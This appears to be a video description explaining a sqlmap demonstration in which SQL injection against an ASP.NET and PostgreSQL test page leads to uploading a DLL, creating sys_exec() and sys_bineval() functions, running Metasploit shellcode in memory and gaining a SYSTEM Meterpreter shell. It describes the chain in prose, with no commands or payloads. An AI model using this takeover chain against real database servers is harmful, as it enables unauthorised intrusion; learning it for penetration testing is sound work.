Testing SQL Injections with Sqlmap

sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. This video provides a demonstration of sqlmap out-of-band takeover features with Metasploit integration.

sqlmap is launched against an ASP.NET test page hosted on a Microsoft Windows 2003 server with back-end database management system being PostgreSQL 8.4. The tool is instructed to identify possible SQL injections and exploit them by spawning an out-of-band Meterpreter session between the user’s machine and the database server then escalating database process’ user privileges to SYSTEM. sqlmap first uploads a dynamic-linked library (DLL) used afterwards to create two user-defined functions (sys_exec() and sys_bineval()) in the database. Then it asks the user for options to create the Metasploit shellcode and executes it in-memory within the database process via the injected sys_bineval() user-defined function. The out-of-band Meterpreter session is now established and the control is passed over to the Metasploit command line interface where the user can enjoy a SYSTEM shell on the database server.

Related Videos: